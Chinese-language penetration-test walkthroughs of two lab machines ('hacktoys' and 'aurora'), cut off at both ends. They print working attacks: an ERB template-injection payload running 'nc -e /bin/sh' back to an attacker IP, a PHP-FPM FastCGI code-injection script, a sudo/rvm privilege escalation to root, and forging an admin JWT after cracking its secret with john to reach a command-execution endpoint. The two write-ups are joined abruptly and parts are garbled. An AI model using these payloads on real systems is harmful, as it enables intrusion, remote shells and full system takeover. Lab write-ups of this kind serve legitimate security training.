SF:ttpParserError$\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0 SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/ SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\ SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby- SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/ SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len SF:gth:\x205702\r\n\r\n\n\n\n SF:\x20\x20\n\x20\x20\n\x20\x20< SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20Action\x20Controller:\x20Exception\x20caught\n\x20\x20\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin: SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\ SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size: SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\ SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px; SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2 SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:"); MAC Address: 00:0C:29:82:76:43 (VMware) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds看到了ssl，尝试使用https访问image-20240916160728361.png漏洞发现web打点查看这五个链接，如图所示，这五个链接都是黑客工具image-20240916171846634.png接下来测试下面的输入框image-20240916172453682.png随意输入内容提示Product does not exist发现这串字符串就是message的参数，修改message为123查看image-20240916172632531.png提示的字符变成了123，这边很明显有一个xss漏洞不过并没什么用image-20240916173245082.png查看网站变成语言，是rubyimage-20240916173606124.pngRuby/ERB ssti经过搜索，这里是ERB的ssti，可用使用<%= (ruby代码) %>模板来执行命名测试一下，将<%= 7*7 %>url编码传入image-20240916180036622.png输入了49，说名存在漏洞尝试反弹shell构造反弹shell命令<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>image-20240916182939850.png有pyhton ，使用python开一下虚拟终端python3 -c "import pty;pty.spawn('/bin/bash')"image-20240916183154924.png提权image-20240916200655562.png在本地开了一个80，9000端口，将这两个端口转发出来lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & $OUTPUT cat $OUTPUT doneimage-20240916205923580.png发现使用dodi用户，直接反弹shell提权至该用户提权至dodi修改执行的命令#!/bin/bash PAYLOAD="';" FILENAMES="/var/www/html/index.php" # Exisiting file path HOST=$1 B64=$(echo "$PAYLOAD"|base64) for FN in $FILENAMES; do OUTPUT=$(mktemp) env -i \ PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \ SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \ cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT cat $OUTPUT doneimage-20240916210302784.png提权至rootsudo -l 发现该用户可以使用sudo运行/usr/local/bin/rvm_rails.sh这个脚本image-20240916210822816.png运行脚本dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh sudo /usr/local/bin/rvm_rails.sh Usage: rails COMMAND [options] You must specify a command: new Create a new Rails application. "rails new my_app" creates a new application called MyApp in "./my_app" plugin new Create a new Rails railtie or engine All commands can be run with -h (or --help) for more information. Inside a Rails application directory, some common commands are: console Start the Rails console server Start the Rails server test Run tests except system tests发现是rails Rails 是使用Ruby 语言编写的网页程序开发框架分析脚本#!/bin/bash export rvm_prefix=/usr/local export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0 export RUBY_VERSION=ruby-3.1.0 export rvm_version=1.29.12 export rvm_bin_path=/usr/local/rvm/bin export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0 export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc export rvm_path=/usr/local/rvm exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"脚本之后执行了/usr/local/rvm/gems/ruby-3.1.0/bin/rails这个文件image-20240916211743699.pngdodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm cat /etc/group | grep rvm rvm:x:1002:lidia,rootlidia用户对该文件有修改权限，使用该用户在这个文件中写入/bin/bash即可提权lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails /usr/local/rvm/gems/ruby-3.1.0/bin/rails lidia@hacktoys:/tmp$ dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh sudo /usr/local/bin/rvm_rails.sh root@hacktoys:/var/www/html# id id uid=0(root) gid=0(root) groups=0(root),1002(rvm)

aurora渗透笔记

2023-10-21T21:41:00+08:00

1.信息收集1.1.目标发现使用virtualbox导入靶机并打开发现靶机的ip是10.177.246.54image-20230510183540374.png1.2.端口信息扫描使用nmap扫描目标ip的所有端口信息┌──(root㉿kali)-[~] └─# nmap -sS -sV 10.177.246.54 -p- Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-10 06:41 EDT Nmap scan report for 10.177.246.54 Host is up (0.00052s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) 3000/tcp open http Node.js Express framework MAC Address: 08:00:27:73:80:C0 (Oracle VirtualBox virtual NIC) Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 12.98 seconds发现目标ip开了22和3000端口3000端口是nodejs写的后端2.漏洞发现2.1.查看目标ip的3000端口image-20230510185737546.png显示Cannot GET / 不能使用get用hackbar改成post再次进行访问image-20230510185857836.png还是显示Cannot POST / 不能使用post2.2.网站爆破使用ffuf工具对网站进行爆破┌──(root㉿kali)-[~] └─# ffuf -w /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.177.246.54:3000/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : GET :: URL : http://10.177.246.54:3000/FUZZ :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ :: Progress: [220560/220560] :: Job [1/1] :: 5882 req/sec :: Duration: [0:00:40] :: Errors: 0 ::发现使用get方式没有爆破出来尝试使用post爆破┌──(root㉿kali)-[~] └─# ffuf -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -X POST -fc 404 -mc all -u http://10.177.246.54:3000/FUZZ /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/FUZZ :: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: all :: Filter : Response status: 404 ________________________________________________ [Status: 401, Size: 22, Words: 2, Lines: 1, Duration: 27ms] * FUZZ: login [Status: 400, Size: 29, Words: 6, Lines: 1, Duration: 25ms] * FUZZ: register [Status: 401, Size: 12, Words: 1, Lines: 1, Duration: 7ms] * FUZZ: execute :: Progress: [207643/207643] :: Job [1/1] :: 4761 req/sec :: Duration: [0:00:38] :: Errors: 0 ::扫描到了三个路径使用curl查看这三个路径┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/login Identifiants invalides ┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register The "role" field is not valid ┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute Unauthorized 2.3.register字段爆破┌──(root㉿kali)-[~] └─# ffuf -w SecLists-master/Discovery/Web-Content/api/objects.txt -X POST -u http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"FUZZ"}' /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/register :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt :: Header : Content-Type: application/json :: Data : {"role":"FUZZ"} :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 ________________________________________________ [Status: 401, Size: 16, Words: 3, Lines: 1, Duration: 30ms] * FUZZ: admin [Status: 500, Size: 32, Words: 5, Lines: 1, Duration: 41ms] * FUZZ: user :: Progress: [3132/3132] :: Job [1/1] :: 1234 req/sec :: Duration: [0:00:02] :: Errors: 0 :: 爆破出admin和user两个字段使用curl测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"admin"}' Not authorized ! 访问admin字段返回Not authorized ! 未授权尝试访问user字段┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user"}' Column 'username' cannot be null 返回Column 'username' cannot be null username字段不能空添加username字段测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user"}' Column 'password' cannot be null 显示Column 'password' cannot be null password字段不能为空添加password字段测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/register -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}' Registration OK 发现注册成功了2.4.登录尝试使用curl登录┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/login -H "Content-Type: application/json" -d '{"role":"user","username":"user","password":"user"}' {"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M"} 登陆之后返回了一个token3.漏洞利用3.1.尝试使用返回的token执行命令这里我们猜测获取命令的字段为cmd来测试┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M" -H "Content-Type: application/json" -d '{"cmd":"id"}' Not authorized返回Not authorized 未授权猜测只有admin用户才有权限执行命令3.2.修改token为admin用户这里我们用jwt.io这个网站来修改token复制我们的token到这个网站image-20230510201918037.png这里需要秘钥使用john爆破┌──(root㉿kali)-[~] └─# echo eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InVzZXIiLCJyb2xlIjoidXNlciIsImlhdCI6MTY4MzcyMDUzNH0.cmIS28gxFWGh8oRJT0YTsETaR7_qsa0D76EI5To194M > user.hash ┌──(root㉿kali)-[~] └─# john -w=rockyou.txt user.hash Using default input encoding: UTF-8 Loaded 1 password hash (HMAC-SHA256 [password is key, SHA256 128/128 AVX 4x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status nopassword (?) 1g 0:00:00:00 DONE (2023-05-10 08:20) 100.0g/s 1228Kp/s 1228Kc/s 1228KC/s total90..hawkeye Use the "--show" option to display all of the cracked passwords reliably Session completed.爆破出秘钥为nopasswordimage-20230510202155574.png将username和role字段都改成admin在下面填入秘钥这样token就修改好了复制这个token 尝试执行命令┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"cmd":"id"}' Error

TypeError [ERR_INVALID_ARG_TYPE]: The "file" argument must be of type string. Received undefined
    at validateString (internal/validators.js:120:11)
    at normalizeSpawnArguments (child_process.js:411:3)
    at spawn (child_process.js:547:16)
    at Object.execFile (child_process.js:237:17)
    at exec (child_process.js:158:25)
    at /opt/login-app/app.js:69:3
    at Layer.handle [as handle_request] (/opt/login-app/node_modules/express/lib/router/layer.js:95:5)
    at next (/opt/login-app/node_modules/express/lib/router/route.js:144:13)
    at /opt/login-app/app.js:112:5
    at /opt/login-app/node_modules/jsonwebtoken/verify.js:261:12

获取命令的字段错了3.3.爆破命令字段┌──(root㉿kali)-[~] └─# ffuf -w /root/SecLists-master/Discovery/Web-Content/api/objects.txt -u http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -X POST -H "Content-Type: application/json" -d '{"FUZZ":"id"}' -fc 500 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v2.0.0-dev ________________________________________________ :: Method : POST :: URL : http://10.177.246.54:3000/execute :: Wordlist : FUZZ: /root/SecLists-master/Discovery/Web-Content/api/objects.txt :: Header : Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk :: Header : Content-Type: application/json :: Data : {"FUZZ":"id"} :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 40 :: Matcher : Response status: 200,204,301,302,307,401,403,405,500 :: Filter : Response status: 500 ________________________________________________ [Status: 200, Size: 54, Words: 3, Lines: 2, Duration: 89ms] * FUZZ: command :: Progress: [3132/3132] :: Job [1/1] :: 1869 req/sec :: Duration: [0:00:01] :: Errors: 0 ::成功爆破出命令字段command3.4.命令执行使用curl执行命令┌──(root㉿kali)-[~] └─# curl -X POST http://10.177.246.54:3000/execute -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNjgzNzIwNTM0fQ.eo5syZPVLegGsaE-5sNZKXUYJ1b6_2t7il3YuRe1Vzk" -H "Content-Type: application/json" -d '{"command":"id"}' uid=33(www-data) gid=33(www-data) groups=33(www-data)命令执行成功接下来反弹shellimage-20230510203354001.pngimage-20230510203406123.png3.5.提权至doro用户image-20230510204016654.png发现www用户可以使用doro用户的权限执行/home/doro/tools.py这个脚本image-20230510204136220.png查看这个脚本权限发现只有读的权限查看这个脚本import os import sys def main(): if len(sys.argv) < 2: print_help() return option = sys.argv[1] if option == "--ping": ping() elif option == "--traceroute": traceroute_ip() else: print("Invalid option.") print_help() def print_help(): print("Usage: python3 network_tool.py